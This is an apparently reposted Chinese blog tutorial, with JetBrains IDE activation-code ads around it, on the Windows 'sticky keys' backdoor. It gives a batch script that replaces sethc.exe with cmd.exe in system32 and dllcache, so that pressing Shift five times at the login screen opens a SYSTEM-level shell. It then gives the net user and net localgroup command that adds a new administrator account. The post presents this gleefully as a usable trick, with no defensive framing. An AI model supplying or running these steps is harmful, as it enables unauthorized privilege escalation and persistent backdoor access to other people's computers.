大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。
Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺
首先,我们要说的是shift这个键连续按5下它会自动弹出个对话框.这个是windows里面自带的功能键
连续按5下后操作系统会自动找到c:\windows\system32\ 下面一个叫sethc.exe 的程序, 然后会弹出如下对话框
[p_w_upload=9]
在进程里面我们可以看到这个程序被系统运行了 不过是以我们自己的用户运权限行的
[p_w_upload=8]
但是当我们未登陆系统(停留在登陆界面)的时候 系统还不知道我们将以哪个用户登陆,所以在这个时候连续按5次shift后门的话系统将会以system用户(具有管理员级别的权限)来运行sethc.exe这个程序 那么试想一下如果我们把cmd.exe这个程序更名称sethc.exe并且把原来的sethc.exe替换掉的话 那么在登陆界面的时候我们连续按下5吃shift键系统以system权限就会运行我们的CMD.exe 那么我们的cmd.exe就具有了管理员权限了 如此一来 我们只要利用CMD加一个管理员用户就可以登陆进去了 嘿嘿~~是不是很过瘾呢~~
具体操作如下
写一个批处理程序来实现吧
新建一个记事本 然后输入以下内容,并保存为.bat后缀的文件
echo 提权开始……
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe
copy c:\windows\system32\dllcache\sethc.exe c:\windows\system32\sethc.exe
echo 提权结束……
双击下这个BAT文件然后注销到登陆界面按5次shift 会弹出个cmd命令行
在里面输入如下内容
net user 你要添加的用户名 密码 /add && net localgroup administrators 你要添加的用户名 /add
然后以你添加的用户和密码登陆就可以了 这个时候你的帐户就是管理员权限了 嘿嘿~~~
PS:这招我好久没用了 如果不行的话就自己手动去c:\windows\system32\下找CMD.exe改名成setch.exe把
c:\windows\system32\dllcache\ 和c:\windows\system32\ 下的sethc.exe给替换了就可以了
转载于:https://blog.51cto.com/linmusen/334416
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/192330.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...
